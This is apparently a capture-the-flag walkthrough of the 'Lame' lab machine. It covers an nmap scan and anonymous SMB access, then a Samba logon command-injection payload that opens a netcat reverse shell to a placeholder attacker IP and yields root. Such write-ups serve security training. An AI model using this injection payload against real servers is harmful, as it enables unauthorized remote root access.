Lame propic

Start off with a network scan:

nmap -sV -sC -oA nmap/lame 10.10.10.3

nmap

There are open ports on TCP 21, 22, 139, 445. Initally, I am interested in the anonymous logon in ftp(21), but there are no notable files there.

So, I divert my attention to the available smbshare(139,445) and attempt to login to the tmp directory via the command:

smbclient -N //10.10.10.3/tmp

I am able to successfully logon anonymously to the smb share and list the relevant commands.

smb

I notice that the ‘logon’ command is available in smb. So, I can create a listener and reverse shell with the following commands:

nc -lvnp 6200
logon "./=`nohup nc -e /bin/sh <attacker_ip> 6200`"

I receive a shell and we are now root. From there, I am easily able to capture both the user.txt and root.txt under /home/makis/ and /root/.

root